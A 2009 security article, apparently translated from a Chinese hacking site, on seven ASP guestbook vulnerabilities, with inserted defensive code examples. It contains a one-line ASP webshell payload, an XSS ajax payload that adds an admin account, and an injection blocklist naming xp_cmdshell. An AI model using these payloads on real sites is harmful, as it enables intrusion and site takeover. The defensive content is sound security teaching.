Discovering vulnerabilities in guestbooks - vulnerability warning - the black bar safety net

2009-04-21T00:00:00
ID MYHACK58:62200922995
Type myhack58
Reporter Anonymous
Modified 2009-04-21T00:00:00

Description

A guestbook has a single function: for ordinary visitors it only lets them leave messages. Very little of the code concerns the administrator side. Typically the administrator can reply to, edit and delete messages; some guestbooks also let the administrator change site settings such as the site title.

Common Vulnerability ①

Conn.asp database path disclosure ('storm library') vulnerability

Test program: Baba Studio guestbook 2.0

Vulnerability code:

<%
dim conn,mydb,db,rs
db=dbstr&"data/#baba@yaoyao520.mdb"
AccessPath=dbstr&"data"
Set Conn = Server.CreateObject("ADODB.Connection")
mydb="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath(""&db&"")
Conn.Open Mydb
%>

This isn't really exploit code; the cause of this vulnerability is explained in the VIP script intrusion tutorials [Lesson 5], 'Storm library: principles and practice'.

Requesting conn.asp directly bursts the path out in the error message.


'C:\Inetpub\111\留言本 2.0\include\data\#baba@yaoyao520.mdb'

Look at this part. The real database file is at C:\Inetpub\111\留言本 2.0\data\#baba@yaoyao520.mdb.

Prevention methods:

Add an error-tolerance statement directly in conn.asp:

On error resume next

This only suppresses the error text; the database file itself is dealt with in the next section.


Common Vulnerability ②

Database download vulnerability

There are actually two kinds of database download vulnerability.

  1. Default database download.

Because many people pay no attention to guestbook security, many sites use the default database, which can therefore be downloaded.

Or test more programs. The # in the path must be converted to %23.


If the suffix is asp or asa, opening it in the browser shows garbled output; a download tool such as Thunder can download it instead.


  2. Use the path disclosure vulnerability to get the database path, then download it. The download method is as above.

Prevention methods:

  1. Change the default database path.

  2. Add an anti-download table.
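As an added example (not the guestbook's own code), a conn.asp that addresses both sections above: the database is kept outside the web root, where no URL reaches it, and a failed connection returns a generic message instead of the error text that carries the physical path. The D:\guestbook_data path is a placeholder.

```asp
<%
' Added example (not the guestbook's own code): conn.asp with the database kept
' outside the web root and no error text returned to the client.
' Assumed: the .mdb has been moved to D:\guestbook_data\ (placeholder path) and the
' IIS anonymous account has read/write permission to that folder.
Dim conn, mydb, dbPath
dbPath = "D:\guestbook_data\guestbook.mdb"   ' an absolute path, not under wwwroot,
                                             ' so no URL can request the file
mydb = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & dbPath

On Error Resume Next
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open mydb
If Err.Number <> 0 Then
    ' Err.Description holds the physical path; keep it server-side (write it to
    ' a log file here) and answer the client with a generic message only.
    Response.Clear
    Response.Status = "500 Internal Server Error"
    Response.Write "Database unavailable."
    Response.End
End If
On Error GoTo 0   ' restore normal error handling for the page that includes this file
%>
```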

Common Vulnerability ③

Injection vulnerability

The injection vulnerability here is the same as an ordinary injection vulnerability. Since I haven't found a good example, I modified the previous code a bit.

Test program: Baba Studio guestbook 2.0

Remove the anti-injection code on the conn.asp side.

lives.asp

set rs=server.CreateObject("adodb.recordset")
sql="select * from gonggao where id="&request.QueryString("id")
rs.open sql,conn,1,3

Because the variable id is not filtered, code can be injected.


But the program's conn.asp has anti-injection code.

The code is as follows:

<%
'-------- Definitions ------------------
Dim XH_Post,XH_Get,XH_In,XH_Inf,XH_Xh,XH_db,XH_dbstr
'Custom list of strings to filter, separated by "|"
XH_In = "'|;|and|exec|insert|select|delete%20from|update|count|*|%|chr|mid|master|truncate|char|declare|drop%20table|from|net%20user|xp_cmdshell|/add|net%20localgroup%20administrators|Asc|char"
'----------------------------------
%>

<%
XH_Inf = split(XH_In,"|")
'-------- POST part ------------------
If Request.Form<>"" Then
    For Each XH_Post In Request.Form
        For XH_Xh=0 To Ubound(XH_Inf)
            If Instr(LCase(Request.Form(XH_Post)),XH_Inf(XH_Xh))<>0 Then
                Response.Write "<Script Language=JavaScript>alert('The submitted content is illegal! If you have questions add my QQ: 253436577');</Script>"
                Response.Write "Illegal operation! The system has made the following record↓<br>"
                Response.Write "Operation IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
                Response.Write "Operation time:"&Now&"<br>"
                Response.Write "Operation page:"&Request.ServerVariables("URL")&"<br>"
                Response.Write "Submission method: POST<br>"
                Response.Write "Submitted parameter:"& XH_Post &"<br>"
                Response.Write "Submitted data:"&Request.Form(XH_Post)
                Response.Write "<Script Language=JavaScript>alert('The submitted content is illegal! If you have questions add my QQ: 253436577');window.close();</Script>"
                Response.End
            End If
        Next
    Next
End If
'----------------------------------
'-------- GET part -------------------
If Request.QueryString<>"" Then
    For Each XH_Get In Request.QueryString
        For XH_Xh=0 To Ubound(XH_Inf)
            If Instr(LCase(Request.QueryString(XH_Get)),XH_Inf(XH_Xh))<>0 Then
                Response.Write "<Script Language=JavaScript>alert('The submitted content is illegal! If you have questions add my QQ: 253436577');</Script>"
                Response.Write "Illegal operation! The system has made the following record↓<br>"
                Response.Write "Operation IP:"&Request.ServerVariables("REMOTE_ADDR")&"<br>"
                Response.Write "Operation time:"&Now&"<br>"
                Response.Write "Operation page:"&Request.ServerVariables("URL")&"<br>"
                Response.Write "Submission method: GET<br>"
                Response.Write "Submitted parameter:"& XH_Get &"<br>"
                Response.Write "Submitted data:"&Request.QueryString(XH_Get)
                Response.Write "<Script Language=JavaScript>alert('The submitted content is illegal! If you have questions add my QQ: 253436577');window.close();</Script>"
                Response.End
            End If
        Next
    Next
End If
'----------------------------------
%>

Everyone is familiar with this code; it is the standard anti-injection routine. Anyone who has followed injection over the past year knows that this code does not filter cookies, so we can use cookie injection.

Prevention methods:

  1. Add cookies to the anti-injection code.

  2. Filter the variables that are obtained.

Common Vulnerability ④

Back-end login verification vulnerability

Simply put, this is a variant of the SQL injection vulnerability.

Test program: the 'Mood Story House' guestbook system

checkpass.asp

<!--#include file="conn.asp" -->
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<%
admin=request.form("admin") 'admin holds the user name passed from the form field "admin"
password=request.form("password") 'password holds the password passed from the form field "password"
if admin="" or password="" then 'if the user name or password was not entered, run the next statement
response.Write("<script language=javascript>alert('Please fill in completely!'); history.go(-1)</script>") 'prompt the user with a javascript alert
end if 'end of the if statement
sql="select * from admin where admin='"&admin&"' and password='"&password&"'" 'query the admin table on the admin and password fields
set rs=conn.execute(sql) 'create the recordset rs by executing the SQL statement on conn
if rs.eof or rs.bof then 'when no record matches the condition, run the following statements
response.write "<script language=javascript>"
response.write "alert('Wrong user name or password!');"
response.write "javascript:history.go(-1);"
response.write "</script>" 'prompt the user with a javascript alert
else 'when a record matches
session("admin")=admin 'create a new session whose value is the user name from the form
response.write"<SCRIPT language=JavaScript>alert('Login successful');"
response.write"this.location.href='mymanage.asp';</SCRIPT>"
end if 'end of the if statement
%>


Prevention methods:

For this vulnerability, filtering the single quote (') is enough.

However, for injection in general, be sure to filter comprehensively.
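Filtering characters works only as long as the list is complete; binding the values as parameters removes the problem, since the input never becomes part of the SQL text. As an added example that is not the guestbooks' own code, the lives.asp and checkpass.asp queries above rewritten with ADODB.Command parameters; conn is assumed to be the open connection from conn.asp, and the 50-character column size is an assumption.

```asp
<%
' Added example (not the guestbooks' own code): the two queries from this page
' with the values bound as parameters instead of pasted into the SQL string.
' Assumed: conn is the open ADODB.Connection from conn.asp; table and column
' names are the ones shown on this page; admin/password columns hold <= 50 chars.
Const adInteger = 3, adVarWChar = 202, adParamInput = 1   ' ADO constants (adovbs.inc values)

' lives.asp: the id must be a number; returns Nothing otherwise
Function GetGonggao(conn, idText)
    Dim cmd
    Set GetGonggao = Nothing
    If Not IsNumeric(idText) Then Exit Function
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "select * from gonggao where id = ?"
    cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, , CLng(idText))
    Set GetGonggao = cmd.Execute
End Function

' checkpass.asp: both strings are bound, so a quote in either is just data
Function FindAdmin(conn, admin, password)
    Dim cmd
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandText = "select * from admin where admin = ? and password = ?"
    cmd.Parameters.Append cmd.CreateParameter("admin", adVarWChar, adParamInput, 50, CStr(admin))
    cmd.Parameters.Append cmd.CreateParameter("password", adVarWChar, adParamInput, 50, CStr(password))
    Set FindAdmin = cmd.Execute
End Function

Dim rs
' In lives.asp:
Set rs = GetGonggao(conn, Request.QueryString("id"))
If rs Is Nothing Then Response.End   ' non-numeric id: refuse rather than query

' In checkpass.asp:
Set rs = FindAdmin(conn, Request.Form("admin"), Request.Form("password"))
If rs.EOF Then
    Response.Write "Wrong user name or password."
Else
    Session("admin") = rs("admin")   ' store the name from the table, not the raw form value
End If
%>
```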

Common Vulnerability ⑤

Database write vulnerability

Finding code for this vulnerability was rather laborious, and some of it is laborious to exploit, so I modified it to make the comparison direct.

Index.asp

Id=Request.Querystring("Id")
Books_mingzi=htmlencode(Request.form("mingzi"))
If Books_mingzi="" then Books_mingzi="anonymous" End If
Books_biaoti=htmlencode(Request.form("biaoti"))
Books_neirong=htmlencode(Request.form("neirong"))

The use of htmlencode here is excellent; we remove just one filter and then test.

I'll remove the htmlencode in front of neirong.

Submit <%execute request("value")%> as the content; the database path can then be accessed as shown below.


Submitting it directly with the 'blue screen' one-sentence client works.

That is a simple explanation in writing.

Now let's look at the code for this, which is fairly simple.

I didn't actually test this here, but I remember someone wrote a dedicated article about it around 2006, for PHP; ASP is probably about the same.

Set mRs= Server.CreateObject("adodb.recordSet")
mRs.open "Select * from dqe_gustbook", conn, 1, 3
mRs.addnew
mRs("who") = Books_mingzi
mRs("biaoti") = Books_biaoti
mRs("neirong") = Books_neirong
mRs("lanmu") = lanmu
mRs("zhiding") = 0
mRs("shijian") = now()
UserIP = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If UserIP = "" Then userip = Request.ServerVariables("REMOTE_ADDR")
mRs("ip") = UserIP
mRs.update
mRs.close

Look at these two lines:

UserIP = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
If UserIP = "" Then userip = Request.ServerVariables("REMOTE_ADDR")

Because the value of HTTP_X_FORWARDED_FOR comes from the HTTP header X-Forwarded-For, this gives a malicious user a way in: the IP address can be faked!

That is all I'll say about this; I hope you continue to study it on your own.

Many filter forms can be bypassed; I want everyone to use their own creativity and share their tips.
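Only REMOTE_ADDR is set by the server from the TCP connection; X-Forwarded-For is whatever the sender put there. As an added example (not the guestbook's own code), a ClientIP function that ignores the header unless the request arrived from a proxy the site operates; the proxy address 10.0.0.5 is a placeholder, and only IPv4 is checked.

```asp
<%
' Added example (not the guestbook's own code): take the client address from
' REMOTE_ADDR, and consult X-Forwarded-For only when the request came through a
' proxy this site operates. TRUSTED_PROXIES holds a placeholder address; with no
' proxy in front of IIS it should be left empty ("||"). IPv4 only.
Const TRUSTED_PROXIES = "|10.0.0.5|"

Function IsIPv4(s)
    Dim re
    Set re = New RegExp
    re.Pattern = "^(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)(\.(25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)){3}$"
    IsIPv4 = re.Test(s)
End Function

Function ClientIP()
    Dim remoteAddr, xff, parts
    remoteAddr = CStr(Request.ServerVariables("REMOTE_ADDR"))   ' set by IIS from the TCP peer
    ClientIP = remoteAddr
    ' Anyone can send X-Forwarded-For; only a known proxy is allowed to speak for the client.
    If InStr(TRUSTED_PROXIES, "|" & remoteAddr & "|") = 0 Then Exit Function
    xff = CStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"))
    If xff = "" Then Exit Function
    ' Each proxy appends the address it saw, so with one trusted proxy the last
    ' entry is the one it observed; earlier entries are still client-controlled.
    parts = Split(xff, ",")
    xff = Trim(parts(UBound(parts)))
    If IsIPv4(xff) Then ClientIP = xff
End Function

' Replaces the two UserIP lines in Index.asp above:
UserIP = ClientIP()
%>
```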

Common Vulnerability ⑥

Embedded XSS vulnerability

This uses the 'Deep Learning' (asp) message board, which was the Hacker Defense challenge topic.

The content we submit is <script>alert("hacker Defense")</script>


Log in to the back end and view the message to see the cross-site effect.


Next we use the cross-site hole to carry out the operations we need.

In this challenge I asked you to modify the message and append it to the second-to-last message.

So far only one person has completed this challenge: Ice Wind Valley [Z.S.T].

Here I directly use the ajax code he wrote to finish this lesson.

function getXHR() {
    var xhr = null;
    if (window.XMLHttpRequest) {
        xhr = new XMLHttpRequest();
    } else if (window.createRequest) {
        xhr = window.createRequest();
    } else if (window.ActiveXObject) {
        try {
            xhr = new ActiveXObject('Msxml2.XMLHTTP');
        } catch (E) {
            try {
                xhr = new ActiveXObject('Microsoft.XMLHTTP');
            } catch (E) {}
        }
    }
    return xhr;
}

var ajax = getXHR();
ajax.open('POST','/admin/guestBook/guestBook_update.asp',false);
ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
ajax.send("guestName=test&guestContent=bingxuefenggu&guest_ID=19");//
ajax.onreadystatechange=function() {}

var ajax1 = getXHR();
ajax1.open('POST','/admin/adminUser/adminUser_Add.asp',false);
ajax1.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
ajax1.send("UserName=test&password1=test");

These two submissions are both POST-based; the first modifies the post and the second adds a user. Ice Wind Valley wasn't being obedient: I only asked for the content to be modified, but he added a user as well.

Prevention methods:

Function htmlencode(fString)
    If not isnull(fString) then
        fString = replace(fString, ">", "&gt;")
        fString = replace(fString, "<", "&lt;")
        fString = Replace(fString, CHR(32), "&nbsp;")
        fString = Replace(fString, CHR(9), "&nbsp;")
        fString = Replace(fString, CHR(34), "&quot;")
        fString = Replace(fString, CHR(39), "&#39;")
        fString = Replace(fString, CHR(13), "")
        fString = Replace(fString, CHR(10) & CHR(10), "</p><p> ")
        fString = Replace(fString, CHR(10), "<br> ")
        htmlencode = fString
    End If
End Function
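The function above does not escape "&", so input that already contains an entity passes through unchanged (Server.HTMLEncode covers &, <, >, and " but not the newline handling). Separately, the two POST requests in the ajax code above succeed because the admin handlers act on any request that carries the administrator's session, which a page on another site can also send; as an added example that is not the message board's own code, a per-session token check such handlers could include. The field name csrf_token, the session key, and Session("admin") being set by the login page are assumptions.

```asp
<%
' Added example (not the message board's own code): a per-session token that admin
' POST handlers such as guestBook_update.asp and adminUser_Add.asp check before
' acting. Assumed: the login page sets Session("admin"); the field name
' "csrf_token" and the session key are assumptions.

Function CsrfToken()
    ' One token per session. Classic ASP has no built-in CSPRNG; a GUID from
    ' Scriptlet.TypeLib is the usual substitute and is assumed acceptable here.
    If Session("csrf_token") = "" Then
        Session("csrf_token") = Left(Server.CreateObject("Scriptlet.TypeLib").GUID, 38)
    End If
    CsrfToken = Session("csrf_token")
End Function

Function CsrfValid()
    ' The token must arrive in the POST body and match the session value byte for byte.
    Dim sent
    sent = CStr(Request.Form("csrf_token"))
    CsrfValid = (CStr(Request.ServerVariables("REQUEST_METHOD")) = "POST") _
        And (Len(sent) > 0) And (Len(Session("csrf_token")) > 0) _
        And (StrComp(sent, Session("csrf_token"), vbBinaryCompare) = 0)
End Function

' In the admin forms, emit the token as a hidden field:
'   <input type="hidden" name="csrf_token" value="..."> with the value set to
'   Server.HTMLEncode(CsrfToken())
' At the top of every admin POST handler:
If Session("admin") = "" Or Not CsrfValid() Then
    Response.Status = "403 Forbidden"
    Response.End
End If
' Note: this stops requests issued from another site. Script already running on
' this origin (the stored XSS above) can read the form and its token, so output
' encoding of stored messages remains the primary fix.
%>
```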

Common Vulnerability ⑦

URL XSS vulnerability

I don't want to say much about URL cross-site scripting; it is almost the same as the embedded XSS above.

We can look at the multiple URL XSS vulnerabilities in Dongwang (动网):

http://sites.google.com/site/bsnguanzhujiaobenanquan/-b-s-n-gong-gao/asploudongdongwangduogeurlxsskuazhanloudong